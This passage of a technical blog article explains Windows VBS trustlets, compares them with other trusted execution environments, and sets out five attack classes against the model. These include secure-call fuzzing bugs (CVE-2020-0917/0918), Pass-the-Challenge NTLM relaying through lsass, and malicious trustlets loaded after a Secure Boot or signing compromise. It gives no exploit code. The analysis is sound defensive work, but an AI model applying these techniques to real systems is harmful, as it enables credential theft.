&lt;p&gt;Windows 11 Build 26100.2314 or later... Windows Server 2025 or later... Visual Studio 2022 version 17.9 or later... The Windows Software Development Kit (SDK) version 10.0.22621.3233 or later, which provides veiid.exe (the VBS Enclave import ID binding utility) and signtool.exe... A Trusted Signing account [@msdocs-vbs-enclaves].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Azure SQL&apos;s &quot;Always Encrypted with secure enclaves&quot; is the public flagship consumer. The architectural difference from an inbox trustlet is the API surface and the enclave-versus-process model: a VBS Enclave is a region inside an existing process&apos;s address space, not a separately scheduled process. The threat model is identical: the host (the rest of the process, including its VTL0 code) is the attacker, the enclave is the defender [@pulapaka-vbs-enclaves].&lt;/p&gt;
&lt;h3&gt;Roster table&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Trustlet ID&lt;/th&gt;
&lt;th&gt;Binary&lt;/th&gt;
&lt;th&gt;VTL0 agent&lt;/th&gt;
&lt;th&gt;ALPC endpoint&lt;/th&gt;
&lt;th&gt;Secret / operation&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;Secure Kernel Process&lt;/td&gt;
&lt;td&gt;(internal; no external agent)&lt;/td&gt;
&lt;td&gt;(internal)&lt;/td&gt;
&lt;td&gt;Device Guard / HVCI policy decisions&lt;/td&gt;
&lt;td&gt;[@ionescu-bh2015]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;&lt;code&gt;LsaIso.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;lsass.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;LSA_ISO_RPC_SERVER&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;NTLM hashes, Kerberos TGTs; &lt;code&gt;EncryptData&lt;/code&gt; / &lt;code&gt;DecryptData&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;[@msdocs-credential-guard] [@ionescu-bh2015]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;&lt;code&gt;vmsp.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;vmwp.exe&lt;/code&gt; (per partition)&lt;/td&gt;
&lt;td&gt;per-instance, partition GUID scoped&lt;/td&gt;
&lt;td&gt;Hyper-V vTPM, host side; secure storage &lt;code&gt;Get&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;[@ionescu-bh2015] [@msdocs-guarded-fabric]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;vTPM provisioning trustlet&lt;/td&gt;
&lt;td&gt;(Hyper-V provisioning agent)&lt;/td&gt;
&lt;td&gt;per-instance, partition GUID scoped&lt;/td&gt;
&lt;td&gt;Initial secret provisioning; secure storage &lt;code&gt;Set&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;[@ionescu-bh2015]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(unpublished)&lt;/td&gt;
&lt;td&gt;ESS face-algorithm component&lt;/td&gt;
&lt;td&gt;Hello biometric pipeline; sensor-issued cert auth&lt;/td&gt;
&lt;td&gt;not publicly named&lt;/td&gt;
&lt;td&gt;Face template matching (fingerprint matching under ESS is match-on-sensor)&lt;/td&gt;
&lt;td&gt;[@msdocs-ess]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(unpublished)&lt;/td&gt;
&lt;td&gt;Administrator Protection issuer&lt;/td&gt;
&lt;td&gt;UAC / Authorization Manager broker&lt;/td&gt;
&lt;td&gt;not publicly named&lt;/td&gt;
&lt;td&gt;Just-in-time admin token issuance&lt;/td&gt;
&lt;td&gt;[@msdocs-admin-protection]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(third-party)&lt;/td&gt;
&lt;td&gt;VBS Enclave DLL&lt;/td&gt;
&lt;td&gt;host process (&lt;code&gt;CreateEnclave&lt;/code&gt; caller)&lt;/td&gt;
&lt;td&gt;direct calls via &lt;code&gt;CallEnclave&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Application-defined; e.g., Azure SQL Always Encrypted&lt;/td&gt;
&lt;td&gt;[@msdocs-vbs-enclaves] [@pulapaka-vbs-enclaves]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The published authoritative trustlet list still stops at Trustlet IDs 0-3 from August 2015. Every roster published after that point has been inferred from secondary evidence: kernel symbols, ALPC port enumeration via &lt;code&gt;NtQuerySystemInformation&lt;/code&gt;, documented architectural placements. Microsoft has not republished an authoritative roster for any later Windows release.&lt;/p&gt;

Two trustlets in the list above are *architecturally* trustlets per Microsoft&apos;s published documentation but have not been publicly named or numbered. The ESS face-algorithm matcher is documented to live in VBS-isolated memory, with sensor-certificate authentication and template-encryption keys held in VBS, but the binary&apos;s name and Trustlet ID are not on the public record [@msdocs-ess]. The Administrator Protection token issuer&apos;s implementation surface is even less precisely specified -- &quot;a hidden, system-generated, profile-separated user account&quot; inside &quot;a new security boundary,&quot; but no commitment to whether the issuer is a trustlet, a VBS Enclave, or a separate isolated process [@msdocs-admin-protection]. This article will not invent names or numbers for either. Empirical enumeration via `NtQuerySystemInformation(SystemIsolatedUserModeInformation)` on a current Windows 11 build is the only way to obtain a current roster, and that route is outside the scope of this piece.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Credential Guard prevents the &lt;em&gt;memory-resident&lt;/em&gt; NTLM hash or Kerberos TGT from being read out of VTL0. It does not protect typed-in credentials, the agent-side relay surface, plaintext-secret protocols (CredSSP / NTLMv1 / MS-CHAPv2 / Digest), or liveness; the full four-item enumeration with citations lives in Section 10. Microsoft documents one corner of the limit verbatim: Credential Guard &lt;em&gt;&quot;doesn&apos;t prevent an attacker with malware on the PC from using the privileges associated with any credential&quot;&lt;/em&gt; [@msdocs-credential-guard].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The published roster stops at Trustlet IDs 0-3 from 2015. The actual roster on a 2026 box is bigger. How much bigger Microsoft hasn&apos;t said. That is one of the open problems Section 9 will pick up.&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches&lt;/h2&gt;
&lt;p&gt;Microsoft is not alone. The same threat model -- &quot;protect user-mode code from a compromised OS kernel&quot; -- has been answered six other ways. None is strictly better than a trustlet. None is strictly worse. The right answer depends on what platform you are on, what threat model you have, and what workload you are trying to protect.&lt;/p&gt;

A hardware-enforced or hypervisor-enforced execution context whose memory and state are inaccessible to the surrounding host operating system, including its kernel. The Open Mobile Terminal Platform (OMTP) first defined the term, and GlobalPlatform now publishes the standard APIs (TEE Client API for the host, TEE Internal Core API for the trusted code). Windows trustlets, Intel SGX enclaves, ARM TrustZone Trusted Applications, AMD SEV-SNP confidential VMs, Apple&apos;s Secure Enclave, and seL4 user-mode security servers are all variants of TEE [@wiki-tee].
&lt;h3&gt;Intel SGX&lt;/h3&gt;
&lt;p&gt;Software Guard Extensions launched with the sixth-generation Intel Core processors (Skylake) in 2015 [@wiki-sgx]. SGX adds two CPU instructions with different privilege requirements: &lt;code&gt;ENCLS&lt;/code&gt; (ring 0; the OS issues leaves like &lt;code&gt;ECREATE&lt;/code&gt; on behalf of a user-mode application) and &lt;code&gt;ENCLU&lt;/code&gt; (ring 3; the application issues leaves like &lt;code&gt;EENTER&lt;/code&gt; and &lt;code&gt;EEXIT&lt;/code&gt; to enter and leave its enclave) [@intel-sdm-sgx]. The result is a user-mode-controllable enclave whose memory is encrypted on the way out of the CPU&apos;s Enclave Page Cache to DRAM. The CPU microcode itself, plus the Quoting Enclave, is the TCB. Neither the OS kernel nor the hypervisor sits in the trust path.&lt;/p&gt;
&lt;p&gt;That sounded ideal in 2015. It has not aged well. Foreshadow (USENIX Security 2018, Van Bulck et al.) demonstrated that transient-execution attacks could extract not only enclave memory but the platform&apos;s attestation key [@foreshadow-usenix]. The Foreshadow team&apos;s site states the consequence:&lt;/p&gt;

Foreshadow demonstrates how speculative execution can be exploited for reading the contents of SGX-protected memory as well as extracting the machine&apos;s private attestation key... due to SGX&apos;s privacy features, an attestation report cannot be linked to the identity of its signer. Thus, it only takes a single compromised SGX machine to erode trust in the entire SGX system. -- Foreshadow project site [@foreshadow-attack-eu]
&lt;p&gt;SGAxe (attestation-key extraction) [@sgaxe], Plundervolt (software-controlled undervolting to fault SGX computations) [@plundervolt], SgxPectre (branch-target injection across the enclave boundary) [@sgxpectre], and others followed. Intel deprecated SGX on 11th-generation Core and later client CPUs, which incidentally removed Ultra HD Blu-ray playback on officially licensed software including PowerDVD [@wiki-sgx]. SGX continues on Xeon for confidential cloud workloads but is no longer a target architects pick on Windows clients.The Ultra HD Blu-ray collapse is the closest the SGX deprecation has come to mainstream visibility. PowerDVD&apos;s SGX dependency meant that a client SGX deprecation broke a consumer product line, and Cyberlink had to ship updates rerouting around the dropped CPU feature.&lt;/p&gt;
&lt;h3&gt;AMD SEV-SNP and Intel TDX&lt;/h3&gt;
&lt;p&gt;AMD&apos;s Secure Encrypted Virtualization with Secure Nested Paging (SEV-SNP), introduced on EPYC 7003 (Milan, launched 15 March 2021) [@wiki-amd-epyc], and Intel&apos;s Trust Domain Extensions (TDX), introduced on 4th-generation Xeon Scalable (Sapphire Rapids, launched 10 January 2023) [@wiki-sapphire-rapids], provide &lt;em&gt;whole-VM&lt;/em&gt; confidential computing [@amd-sev-overview] [@intel-tdx-overview]. AMD&apos;s verbatim claim: &lt;em&gt;&quot;SEV-SNP adds strong memory integrity protection to help prevent malicious hypervisor-based attacks like data replay, memory re-mapping, and more to create an isolated execution environment&quot;&lt;/em&gt; [@amd-sev-overview]. Intel&apos;s verbatim claim about TDX: &lt;em&gt;&quot;A CPU-measured Intel TDX module enables Intel TDX. This software module runs in a new CPU Secure Arbitration Mode (SEAM) as a peer virtual machine manager (VMM)&quot;&lt;/em&gt; [@intel-tdx-overview]. The AMD SEV-SNP whitepaper &quot;Strengthening VM Isolation with Integrity Protection and More&quot; is the canonical technical reference [@amd-sev-snp-whitepaper].&lt;/p&gt;
&lt;p&gt;The granularity is different from a trustlet. SEV-SNP and TDX isolate an entire virtual machine from its hypervisor and host. They do not isolate a process from its own VM&apos;s kernel. For &quot;this user-mode process should be protected from a SYSTEM kernel write primitive on the same OS,&quot; a trustlet is the primitive; for &quot;this entire VM should be protected from a compromised cloud provider,&quot; a CVM is the primitive. Use the right one.&lt;/p&gt;
&lt;h3&gt;ARM TrustZone and OP-TEE&lt;/h3&gt;
&lt;p&gt;The two-world hardware split that has shipped on every Cortex-A processor since the mid-2000s -- the Wikipedia ARM architecture article states verbatim that &lt;em&gt;&quot;the Security Extensions, marketed as TrustZone Technology, is in ARMv6KZ and later application profile architectures,&quot;&lt;/em&gt; the lineage every Cortex-A core inherits [@wiki-arm-architecture]. The CPU enforces a Non-Secure World and a Secure World; switching between the two is mediated by a Secure Monitor Call (&lt;code&gt;SMC&lt;/code&gt;) instruction. OP-TEE is the canonical open-source secure-world OS for Cortex-A TrustZone, with Trusted Applications running as user-mode binaries in Secure World EL-0 and the OP-TEE OS itself running at EL-1 [@optee-about]. The OP-TEE about page describes the design: &lt;em&gt;&quot;OP-TEE is a Trusted Execution Environment (TEE) designed as companion to a non-secure Linux kernel running on Arm; Cortex-A cores using the TrustZone technology&quot;&lt;/em&gt; [@optee-about].&lt;/p&gt;
&lt;p&gt;TrustZone is the closest non-Windows analogue to a trustlet at the architectural level. The vocabulary maps one for one.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Concept&lt;/th&gt;
&lt;th&gt;Windows VBS / IUM&lt;/th&gt;
&lt;th&gt;ARM TrustZone / OP-TEE&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Isolation primitive&lt;/td&gt;
&lt;td&gt;Hyper-V hypervisor + SLAT&lt;/td&gt;
&lt;td&gt;TrustZone Address Space Controller; CPU NS/S bit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Secure-side kernel&lt;/td&gt;
&lt;td&gt;Secure Kernel (VTL1 ring 0)&lt;/td&gt;
&lt;td&gt;OP-TEE OS (Secure World EL-1)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Secure-side user mode&lt;/td&gt;
&lt;td&gt;IUM (VTL1 ring 3)&lt;/td&gt;
&lt;td&gt;Trusted Applications (Secure World EL-0)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Agent / supplicant&lt;/td&gt;
&lt;td&gt;The trustlet&apos;s VTL0 agent (e.g., &lt;code&gt;lsass.exe&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;tee-supplicant&lt;/code&gt; and TEE Client API on the Linux side&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trust gate&lt;/td&gt;
&lt;td&gt;Microsoft EKUs + Signature Level 12&lt;/td&gt;
&lt;td&gt;OP-TEE TA signing key configured at build time&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;h3&gt;Apple Secure Enclave Processor (SEP)&lt;/h3&gt;
&lt;p&gt;Apple&apos;s answer is a dedicated on-die security subsystem. SEP is a separate processor core, isolated from the Application Processor on the same SoC, with its own boot ROM, its own AES engine, and its own random number generator. It has been in every iPhone since iPhone 5s (2013), every Apple Silicon Mac, every Apple Watch from Series 1 [@apple-sep]. Apple&apos;s verbatim description:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The Secure Enclave Processor runs an Apple-customized version of the L4 microkernel. It&apos;s designed to operate efficiently at a lower clock speed that helps to protect it against clock and power attacks [@apple-sep].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;SEP is the strongest counter to microarchitectural side channels among the production options, because the cores genuinely do not share microarchitectural state with the Application Processor. The price is that everything is firmware-class: patching a SEP bug means rolling SEP firmware on every Apple device, not pushing an OS update. The cycle is slower and more centralised.&lt;/p&gt;
&lt;h3&gt;seL4 plus user-mode security servers&lt;/h3&gt;
&lt;p&gt;The academic conscience of the lineage. About 8,700 lines of formally verified C, with machine-checked proofs of functional correctness, confidentiality, and integrity [@sel4-sosp-paper] [@sel4-about]. Sub-microsecond IPC. The price is that seL4 is a separation microkernel, not a desktop OS; building a Credential-Guard-equivalent on seL4 means designing the application architecture from the microkernel up, not retrofitting it onto a Windows-compatible stack. seL4 has shipping deployments in defence (the DARPA HACMS programme), automotive ECUs, and the security subsystem of Qualcomm SoCs.&lt;/p&gt;
&lt;h3&gt;When to pick which&lt;/h3&gt;
&lt;p&gt;A decision table of the kind a colleague would actually use.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;You want&lt;/th&gt;
&lt;th&gt;Pick&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Protect a user-mode Windows process from a SYSTEM kernel write primitive&lt;/td&gt;
&lt;td&gt;Trustlet (inbox) or VBS Enclave (third-party) [@msdocs-vbs-enclaves]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protect an entire VM from your cloud provider&apos;s host&lt;/td&gt;
&lt;td&gt;AMD SEV-SNP or Intel TDX [@amd-sev-overview] [@intel-tdx-overview]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protect a user-mode Linux-on-ARM service from a compromised Linux kernel&lt;/td&gt;
&lt;td&gt;TrustZone + OP-TEE Trusted Application [@optee-about]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hold an iPhone owner&apos;s Touch ID / Face ID template safely from iOS&lt;/td&gt;
&lt;td&gt;Apple SEP [@apple-sep]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Build a high-assurance system with a machine-checked proof of kernel correctness&lt;/td&gt;
&lt;td&gt;seL4 [@sel4-sosp-paper]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Run Intel SGX enclaves on Xeon for confidential cloud&lt;/td&gt;
&lt;td&gt;SGX (modulo Foreshadow-class side channels) [@foreshadow-attack-eu]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Trustlets are the right answer for Windows. They are not the right answer for every platform, every threat model, or every workload. They are also not without limits &lt;em&gt;on Windows itself&lt;/em&gt;. What are those?&lt;/p&gt;
&lt;h2&gt;8. The Floor of the Threat Model&lt;/h2&gt;
&lt;p&gt;By 2020 the trustlet model had been shipping for five years. Two researchers at the Microsoft Security Response Center, Saar Amar and Daniel King, pointed a fuzzer at the secure-call interface for two weeks and reported back with five VTL0-to-VTL1 bugs [@amar-bh2020]. Their Black Hat USA 2020 talk, &quot;Breaking VSM by Attacking Secure Kernel,&quot; is the most important public document on what the trustlet model actually guarantees and what it does not [@amar-publications].&lt;/p&gt;
&lt;p&gt;The talk is honest in a way Microsoft is rarely honest about its own products. The slides enumerate the bugs by CVE number, name the specific Secure Kernel routines they exploited, and -- unusually -- list the hardening changes Microsoft shipped because of what was found. Reading the deck is the closest thing to a Q-and-A with the Secure Kernel team.&lt;/p&gt;
&lt;h3&gt;Bug class 1: the secure-call interface is the floor&lt;/h3&gt;
&lt;p&gt;The Secure Kernel exposes about three dozen &quot;secure services&quot; callable from VTL0 via the &lt;code&gt;IumInvokeSecureService&lt;/code&gt; dispatcher. Each takes a parameter block from VTL0, parses it inside VTL1, and returns. That dispatcher is, by definition, the largest VTL0-controllable input surface in the model. Amar and King retargeted the Hyperseed hypercall fuzzer, originally written by Daniel King and Shawn Denbow for hypercall fuzzing, at &lt;code&gt;securekernel!IumInvokeSecureService&lt;/code&gt; [@amar-bh2020]. Two weeks of fuzzing produced five bugs.&lt;/p&gt;
&lt;p&gt;Two of them shipped with public CVE numbers in 2020. CVE-2020-0917 is an out-of-bounds read in the secure-call surface; CVE-2020-0918 is a design flaw in &lt;code&gt;SkmmUnmapMdl&lt;/code&gt; where a VTL0 caller could pass a fully attacker-controlled Memory Descriptor List to &lt;code&gt;SkmiReleaseUnknownPTEs&lt;/code&gt; [@nvd-cve-2020-0917] [@nvd-cve-2020-0918] [@amar-bh2020]. The NVD entries describe both with the same boilerplate (&quot;Windows Hyper-V Elevation of Privilege Vulnerability&quot;) and classify the CWE as &quot;Insufficient Information&quot;; the technical detail lives in the Amar/King deck.&lt;/p&gt;
&lt;p&gt;Microsoft hardened in response. The Amar/King deck enumerates what changed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The Secure Kernel pool moved to segment heap in mid-2019, breaking the heap layout the public exploit depended on.&lt;/li&gt;
&lt;li&gt;Four W+X regions in VTL1 were reduced to +X only, eliminating attacker-controlled code-injection targets.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SkpgContext&lt;/code&gt;, a HyperGuard-style control-flow integrity check for the Secure Kernel, was introduced [@amar-bh2020].&lt;/li&gt;
&lt;/ul&gt;

Alex Ionescu&apos;s term for an attacker-controlled trustlet, enabled by a substrate compromise rather than a trustlet bug. If Test Signing is on, or if a production Microsoft signing key leaks, or if Secure Boot can be bypassed, an attacker can sign and load their own &quot;trustlet&quot; that passes the five gates of Section 5 and operates with VTL1 privilege. The trustlet model itself remains intact; the trust roots underneath it are what fail [@ionescu-bh2015].
&lt;h3&gt;Bug class 2: denial of service is not a security boundary&lt;/h3&gt;
&lt;p&gt;Amar&apos;s deck states the rule that excludes liveness from the VBS threat model verbatim:&lt;/p&gt;

VTL0 can DOS VTL1 by design. -- Saar Amar and Daniel King, Black Hat USA 2020 [@amar-bh2020]
&lt;p&gt;The hypervisor schedules VTL1; VTL0 is the agent for almost every communication channel into VTL1; VTL0 can stop talking to VTL1 at any time. None of this is, in Microsoft&apos;s stated model, a security violation. A VTL0 kernel attacker who can prevent Credential Guard from issuing tickets has not stolen any credential; they have, in the language of the threat model, achieved denial of service, which is out of scope. This matters in practice: a defender cannot reason about a trustlet &quot;always being available.&quot; They can only reason about its memory not being readable from VTL0 &lt;em&gt;when it is available&lt;/em&gt;.&lt;/p&gt;
&lt;h3&gt;Bug class 3: the agent RPC surface lives in VTL0&lt;/h3&gt;
&lt;p&gt;The trustlet&apos;s pages are safe even from VTL0 ring 0. The agent process that services the trustlet&apos;s ALPC port is &lt;em&gt;not&lt;/em&gt; safe. The agent is &lt;code&gt;lsass.exe&lt;/code&gt; for Credential Guard, &lt;code&gt;vmwp.exe&lt;/code&gt; for the vTPM, presumably the Hello biometric pipeline for ESS. Every byte of every protocol whose state machine the agent implements is reachable from VTL0. The hash never leaves VTL1; the &lt;em&gt;authentication outcomes&lt;/em&gt; the hash produces can be relayed.&lt;/p&gt;
&lt;p&gt;In December 2022 Oliver Lyak published &quot;Pass-the-Challenge: Defeating Windows Defender Credential Guard&quot; [@lyak-pass-the-challenge]. The technique recovers usable NTLM challenge responses from encrypted credential blobs that &lt;code&gt;LsaIso.exe&lt;/code&gt; returns to &lt;code&gt;lsass.exe&lt;/code&gt; in VTL0:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In this blog post, we present new techniques for recovering the NTLM hash from an encrypted credential protected by Windows Defender Credential Guard. While previous techniques for bypassing Credential Guard focus on attackers targeting new victims who log into a compromised server, these new techniques can also be applied to victims logged on before the server was compromised [@lyak-pass-the-challenge].&lt;/p&gt;
&lt;/blockquote&gt;

A network authentication protocol that uses NTLM works in challenge-response form: the server sends a challenge, the client encrypts it with its NTLM hash, the server (or a domain controller) verifies the response. With Credential Guard, the client&apos;s NTLM hash lives in `LsaIso.exe`; only `LsaIso.exe` can perform the encryption. A VTL0 attacker who can talk to `lsass.exe` can ask `lsass.exe` to ask `LsaIso.exe` to compute an NTLM response for an attacker-supplied challenge. The attacker never sees the hash; they see an authentication response computed with it. Many real-world relay attacks need only the response, not the hash. Lyak&apos;s writeup is the worked example; the architectural fact is that the agent RPC channel is a VTL0 surface even though the hash itself is not.
&lt;p&gt;Microsoft documents one corner of the limit verbatim: Credential Guard &lt;em&gt;&quot;doesn&apos;t prevent an attacker with malware on the PC from using the privileges associated with any credential&quot;&lt;/em&gt; [@msdocs-credential-guard]. The &quot;use&quot; is the agent-side operation; the trustlet is doing the cryptography, and the cryptography is being used by the attacker.&lt;/p&gt;
&lt;h3&gt;Bug class 4: trustlet-to-trustlet via shared Instance GUIDs&lt;/h3&gt;
&lt;p&gt;Trustlets that share an Instance GUID can read and write storage blobs the Secure Kernel scopes per-Instance. The pair &lt;code&gt;vmsp.exe&lt;/code&gt; and the vTPM provisioning trustlet uses exactly this primitive: provisioning writes, &lt;code&gt;vmsp.exe&lt;/code&gt; reads, the Secure Kernel hard-codes which Trustlet IDs may invoke &lt;code&gt;SecureStorageSet&lt;/code&gt; versus &lt;code&gt;SecureStorageGet&lt;/code&gt; on each Instance GUID. The defence is in the &lt;code&gt;SkCapabilities&lt;/code&gt; table; bugs in that table are exploit-class.&lt;/p&gt;
&lt;p&gt;In Ionescu&apos;s vocabulary, a &quot;malwarelet&quot; is the worst case here: an attacker-controlled trustlet -- enabled by a &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini&quot; rel=&quot;noopener&quot;&gt;Secure Boot&lt;/a&gt; or Test Signing compromise -- could request access to the Instance GUIDs of other trustlets, and any missing rule in &lt;code&gt;SkCapabilities&lt;/code&gt; would let it read what those trustlets stored. There are no public exploits in this class as of mid-2026. There also is not a published audit of the table.&lt;/p&gt;
&lt;h3&gt;Bug class 5: substrate compromise (Secure Boot, firmware, signing keys)&lt;/h3&gt;
&lt;p&gt;If Test Signing is on; if a production signing key leaks; if Secure Boot can be bypassed to boot a kernel that accepts attacker-controlled trustlet roots; if the UEFI firmware itself permits a DMA attack against early-boot memory -- the entire trustlet model is moot. Ionescu&apos;s BH2015 deck states the diagnosis: &lt;em&gt;&quot;VBS&apos; key weakness is its reliance on Secure Boot&quot;&lt;/em&gt; [@ionescu-bh2015]. Rafal Wojtczuk&apos;s Black Hat USA 2016 attack-surface analysis empirically validated the warning, demonstrating one non-critical VBS-feature bypass and one critical firmware exploit [@wojtczuk-bh2016]. The firmware below VBS is the substrate trustlets sit on; the trustlet model is no stronger than that substrate.&lt;/p&gt;

flowchart TD
    Attacker[&quot;VTL0 kernel attacker&quot;]
    SK[&quot;Secure Kernel&quot;]
    Trustlet[&quot;Trustlet (VTL1 user)&quot;]
    Agent[&quot;VTL0 agent process (lsass.exe, vmwp.exe...)&quot;]
    Substrate[&quot;Substrate: UEFI firmware, Secure Boot, signing roots&quot;]
    Attacker --&amp;gt;|&quot;1. Secure-call interface bugs&lt;br /&gt;CVE-2020-0917, CVE-2020-0918&quot;| SK
    Attacker --&amp;gt;|&quot;2. DoS by design (out of scope)&quot;| SK
    Attacker --&amp;gt;|&quot;3. Agent RPC surface&lt;br /&gt;Pass-the-Challenge&quot;| Agent
    Agent --&amp;gt;|&quot;authentication outcome&quot;| Trustlet
    Attacker --&amp;gt;|&quot;4. Trustlet-to-trustlet&lt;br /&gt;via shared Instance GUID&quot;| Trustlet
    Substrate --&amp;gt;|&quot;5. Substrate compromise&lt;br /&gt;malwarelets, BootHole-class&quot;| SK
    Substrate --&amp;gt; Trustlet
&lt;p&gt;The Hyperseed fuzzer had a prior life. Daniel King and Shawn Denbow first presented it at OffensiveCon 2019 as a hypercall fuzzer [@amar-bh2020]. The retargeting at the secure-call interface is the same tool, pointed at a different parser. The two-weeks-five-bugs result is therefore not &quot;Microsoft wrote bad code&quot; but &quot;a well-built fuzzer aimed at a complex parser will find bugs in ~2 weeks.&quot; That is the empirical bar for an unverified TCB.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The trustlet model is hypervisor-strong against the VTL0 kernel; it is not stronger than the substrate it sits on. Five attack classes -- secure-call interface bugs, designed-out denial-of-service, the agent RPC residual, trustlet-to-trustlet via shared Instance GUIDs, and substrate compromise -- bound what the model can guarantee. None of them invalidates trustlets; all of them are reasons to deploy trustlets &lt;em&gt;alongside&lt;/em&gt; other controls rather than as a sole defence.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The trustlet model has a finite, audited attack surface. The surface is not zero. Liveness is not promised. The firmware and Secure Boot underneath everything still matter. What is new on this surface in 2024 to 2026?&lt;/p&gt;
&lt;h2&gt;9. Open Problems&lt;/h2&gt;
&lt;p&gt;Three things you might expect Microsoft to have published by 2026 -- the current inbox trustlet roster, an architecture diagram of Administrator Protection on par with Credential Guard&apos;s, and a public CVE wave around VBS Enclaves -- are still partial or missing. Here is the frontier.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. Trustlet enumeration drift.&lt;/strong&gt; Ionescu&apos;s August 2015 enumeration of Trustlet IDs 0 through 3 remains the only authoritative published list. Eleven years later, the ESS biometric matcher has not been named with a Trustlet ID and the Administrator Protection issuer has not been committed to as a trustlet at all. A researcher with a debugger and the Quarkslab IUM-debugging recipe can recover the current roster empirically [@quarkslab-debug-ium]; Microsoft has not republished it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. VBS Enclave trust-boundary hardening.&lt;/strong&gt; Microsoft&apos;s Security Response Center published a blog post in June 2025 -- &quot;Everything Old Is New Again&quot; -- explicitly committing to host-to-enclave pointer validation, copy-before-check discipline, and TOCTOU avoidance as the active hardening surface for VBS Enclaves [@ms-everything-old]. The post is unambiguous that a CVE wave is foreseeable as researchers turn their attention to the host-enclave seam. As of the publication of this article no public CVE has been issued against a VBS Enclave-using product, but Microsoft&apos;s narrowing of supported Windows builds in 2025 (from &quot;Windows 11 24H2 or later&quot; to &quot;Windows 11 Build 26100.2314 or later&quot;) is the kind of build-floor adjustment that historically precedes a documented hardening change [@msdocs-vbs-enclaves].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Side channels against VTL1.&lt;/strong&gt; Transient-execution attacks against VTL1 memory have not been publicly demonstrated end to end. The Foreshadow class of attacks against SGX is the existence proof that a co-resident TEE can leak through microarchitectural side channels, and the threat model explicitly includes them [@foreshadow-attack-eu]. There is no VBS-specific transient-execution mitigation; platform-wide mitigations (Kernel Virtual Address Shadow, Retpoline, Indirect Branch Restricted Speculation) are the only defence. A demonstration of &quot;Foreshadow-against-LsaIso&quot; would not be surprising; its absence to date is, given the research community&apos;s interest, mildly so.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Debugging asymmetry.&lt;/strong&gt; Researchers have a working trustlet-debugging recipe; defenders have an explicit &quot;no&quot; from Microsoft. The Quarkslab writeup walks through nested virtualisation to attach to a trustlet under controlled conditions [@quarkslab-debug-ium]; Microsoft&apos;s product-facing page states verbatim that &lt;em&gt;&quot;it is not possible to attach to an IUM process&quot;&lt;/em&gt; and that &lt;em&gt;&quot;other APIs, such as CreateRemoteThread, VirtualAllocEx, and Read/WriteProcessMemory will also not work as expected when used against Trustlets&quot;&lt;/em&gt; [@msdocs-ium]. The asymmetry favours offence: an attacker with the time, hardware, and tooling Quarkslab demonstrates can study trustlet internals in ways a defender on a production box cannot. Live-system trustlet introspection for incident response is the missing capability.&lt;/p&gt;
